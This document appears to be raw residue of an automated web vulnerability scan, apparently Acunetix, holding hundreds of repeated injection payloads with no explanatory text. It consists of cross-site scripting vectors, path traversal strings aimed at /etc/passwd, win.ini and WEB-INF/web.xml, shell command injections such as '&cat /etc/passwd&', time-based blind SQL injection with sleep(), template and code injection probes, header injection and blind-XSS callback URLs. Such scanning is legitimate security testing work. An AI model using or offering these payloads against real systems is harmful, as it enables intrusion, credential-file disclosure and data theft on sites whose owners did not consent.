/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950190></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(956680)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(912643)">

1

response.write(9060381*9571827)

1

1

1

WEB-INF/web.xml

'+response.write(9060381*9571827)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965204)"></g></svg>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

'&cat /etc/passwd&'

"+response.write(9060381*9571827)+"

1<div style=width:expression(prompt(940940))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(979892)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921894)>

${99617+99150}

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(937962)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n911471=v900996

1

1

1<img/src=">" onerror=alert(964949)>

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<ScRiPt%20>prompt(998314)</sCripT>

'|'ld

testasp.vulnweb.com

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

AvD2jJee'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

1&lt

1

1

^(#$!@#$)(()))******

YX7gHiDO')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

1

\xf6<img acu onmouseover=prompt(997929) //\xf6>

1

7akFQ7BF'))

1

1

"

/etc/passwd

1

http://hitkoliyOsYzq.bxss.me/

-1

1

'

1<input autofocus onfocus=prompt(920875)>

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

"

<a href='http://www.acunetix.com'>website security</a>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

eA9DBRXF'

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

0cEwj5lg')

1

comments

&dir

1

1'"()&%<ScRiPt >prompt(960323)</ScRiPt>

1_FDKSw <ScRiPt >prompt(931453)</ScRiPt>

1

'"

SE1r4ZAB'))

1

'&dir&'

comments/.

'"()&%<ScRiPt >prompt(951744)</ScRiPt>

1

1

1

<!--

1

file:///etc/passwd

"&dir&"

1

1_990402

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

acu4926\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4926

WEB-INF\web.xml

1

1

1

1

acux9608\xc0\xbez1\xc0\xbcz2a\x90bcxuca9608

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(967539)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(961816)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(926618)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998968></ScRiPt>

1

1<ScRiPt >prompt(959843)</ScRiPt>

................windowswin.ini

1

1

1

1<video><source onerror="javascript:prompt(903974)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988264)"></g></svg>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<div style=width:expression(prompt(986642))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

response.write(9592876*9593353)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9592876*9593353)+'

1

1<body onload=prompt(937948)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987186)>

1

"+response.write(9592876*9593353)+"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=xyz OnErRor=prompt(961545)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(922038)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1<ScRiPt%20>prompt(979827)</sCripT>

1

1

`cat /etc/passwd`

1

1

${100479+100272}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1

|cat /etc/passwd#

1

1&n991741=v951678

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

\xf6<img acu onmouseover=prompt(980004) //\xf6>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(975860)>

testasp.vulnweb.com

ZhT5FiKv'

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

HhxgOH0z')

1

'

'"()

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

r3X1rLhS'))

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_DtICW <ScRiPt >prompt(922400)</ScRiPt>

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitS02u1UfSJf.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

1

comments

1

1

"&dir&"

1

HnC1VDVB'

'"

1

1'"()&%<ScRiPt >prompt(959546)</ScRiPt>

1

1

file:///etc/passwd

comments

|dir

kfhJqOah')

<!--

'"()&%<ScRiPt >prompt(960469)</ScRiPt>

1

'|dir

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

TgDICYPg'))

1

1_937246

1

"|dir

1

WEB-INF/web.xml

1

1

1

1

1

1

acu5484\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5484

WEB-INF\web.xml

1

1

1

acux10079\xc0\xbez1\xc0\xbcz2a\x90bcxuca10079

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(980618)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<script>prompt(959074)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(974572)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988199></ScRiPt>

................windowswin.ini

1

1

1<ScRiPt >prompt(981977)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(945212)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984595)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9213248*9717207)

1

1<div style=width:expression(prompt(974037))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9213248*9717207)+'

1

1

1<iframe src='data:text/html

"+response.write(9213248*9717207)+"

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<body onload=prompt(983999)>

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961825)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

1<img src=xyz OnErRor=prompt(944036)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${100483+99133}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1)

1<img/src=">" onerror=alert(904513)>

1

1

1

1

1

1

1<ScRiPt%20>prompt(956889)</sCripT>

-1))

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n954542=v927955

1

)

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1some_inexistent_file_with_long_name%00.jpg

"|"ld

aDgfi3wW'

'"()

1

\xf6<img acu onmouseover=prompt(942548) //\xf6>

1

!(()&&!|*|*|

/etc/passwd

1

8nOVWCS1')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(914055)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

tohBeDqA'))

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

"

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

"

1

-1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1_SIV1R <ScRiPt >prompt(967840)</ScRiPt>

1

http://hits19QNXkQWV.bxss.me/

comments

1

1

||cat /etc/passwd

-1)

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

file:///etc/passwd

1

-1))

comments/.

1

1

1

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

/\../\../\../\../\../\../\../etc/passwd

k7k4Hla1'

1

1

http://www.acunetix.tst

"&dir&"

1

1

GgwFTZXd')

WEB-INF/web.xml

1

1

1

'"

1

1'"()&%<ScRiPt >prompt(987165)</ScRiPt>

|dir

1

1

<!--

1

WEB-INF\web.xml

LEmNYNtm'))

'|dir

'"()&%<ScRiPt >prompt(984657)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_990302

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4734\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4734

1

1

1

................windowswin.ini

acux4226\xc0\xbez1\xc0\xbcz2a\x90bcxuca4226

1

1

1<ScRiPt >prompt(926510)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(906897)</script>

1

1<ScRiPt >prompt(912899)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988529></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(900971)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(965762)">

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936325)"></g></svg>

1

1

response.write(9977935*9528289)

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(940208))>

'+response.write(9977935*9528289)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9977935*9528289)+"

1

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<body onload=prompt(922067)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960335)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

`cat /etc/passwd`

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(958691)>

-1)

|cat /etc/passwd#

1

${99262+99038}

1

1<img/src=">" onerror=alert(942586)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

1

1

'|'ld

1

1<ScRiPt%20>prompt(952007)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1&n945932=v902733

o1Cu8nw3'

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

!(()&&!|*|*|

rgAZzoHe')

\xf6<img acu onmouseover=prompt(973094) //\xf6>

testasp.vulnweb.com

1

/etc/passwd

1

'

ULoXaWiq'))

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(981694)>

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

-1

1

"

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

http://hit1rokoGF0ne.bxss.me/

-1))

1

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

'&dir&'

1

1_mSFR7 <ScRiPt >prompt(986037)</ScRiPt>

DqST34aM'

1

1

1

1

1

"&dir&"

hhDKWpzS')

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

http://www.acunetix.tst

1

1

1

anSxqrOD'))

|dir

1

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1

comments

1

'|dir

1'"()&%<ScRiPt >prompt(959402)</ScRiPt>

1

<!--

1

comments/.

1

WEB-INF/web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(929800)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1_904635

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu7003\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7003

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6215\xc0\xbez1\xc0\xbcz2a\x90bcxuca6215

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(969827)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(975444)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(990107)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961880></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(929767)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(983114)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954272)"></g></svg>

1

1

1<div style=width:expression(prompt(966525))>

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

1<body onload=prompt(974864)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904515)>

1

1<img src=xyz OnErRor=prompt(974980)>

1

1<img/src=">" onerror=alert(976876)>

1

1

1

1<ScRiPt%20>prompt(997291)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(924251) //\xf6>

1<input autofocus onfocus=prompt(963319)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_IWQVE <ScRiPt >prompt(916120)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9201200*9638913)

1

1

'+response.write(9201200*9638913)+'

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9201200*9638913)+"

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

${99504+99970}

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

-1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n925860=v958812

)

|cat /etc/passwd#

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

'|'ld

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

'"()

ohAqCCOr'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

'

1

1

/etc/passwd

JFwf97JK')

http://hitjgy6IPhusW.bxss.me/

1

1

"

'

acunetix_wvs_invalid_filename

1

ibt3QnRC'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

comments

1

"

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

<!--

1

comments/.

1'"()&%<ScRiPt >prompt(953936)</ScRiPt>

&dir

1

1

q2P6UQ7o'

1

'"()&%<ScRiPt >prompt(982930)</ScRiPt>

file:///etc/passwd

LHC2S9OH')

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1_998869

fuN3Ds7X'))

1

1

"&dir&"

1

WEB-INF/web.xml

1

1

|dir

acu1914\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1914

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

acux4421\xc0\xbez1\xc0\xbcz2a\x90bcxuca4421

"|dir

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(907580)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(953836)</script>

1

1

1<ScRiPt >prompt(921921)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997781></ScRiPt>

................windowswin.ini

1<ScRiPt >prompt(929186)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(963201)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903087)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9078449*9331759)

1

1<div style=width:expression(prompt(923785))>

1

1

&cat /etc/passwd&

'+response.write(9078449*9331759)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9078449*9331759)+"

'&cat /etc/passwd&'

1<body onload=prompt(900207)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965392)>

"&cat /etc/passwd&"

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(924042)>

1

1

WEB-INF\web.xml

1

cat /etc/passwd

${99945+100198}

1<img/src=">" onerror=alert(969384)>

../../../../../../../../../../etc/passwd.jpg

1

-1

`cat /etc/passwd`

1

1

1

1

1<ScRiPt%20>prompt(984086)</sCripT>

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n921767=v903942

1

1&lt

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

)

1

1

1

"|"ld

\xf6<img acu onmouseover=prompt(954283) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

ag7nOW9P'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(913313)>

1

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

N9eckj7P')

1

"

1

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

AQw1qYLc'))

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

1_peCVw <ScRiPt >prompt(948127)</ScRiPt>

1

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

&dir

http://hit2LO4Vzrmtr.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

acunetix_wvs_invalid_filename

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

q7qUXXB9'

1

http://www.acunetix.tst

1

1

1

"&dir&"

'"

comments

1

1'"()&%<ScRiPt >prompt(950942)</ScRiPt>

oaTWou9g')

file:///etc/passwd

1

|dir

comments/.

1

<!--

'"()&%<ScRiPt >prompt(986550)</ScRiPt>

'|dir

63wEqlYe'))

/\../\../\../\../\../\../\../etc/passwd

1_925664

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

acu8026\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8026

1

WEB-INF\web.xml

1

1

acux9684\xc0\xbez1\xc0\xbcz2a\x90bcxuca9684

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(945033)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(941683)</script>

1

1

1

1<ScRiPt >prompt(926348)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948489></ScRiPt>

1

1

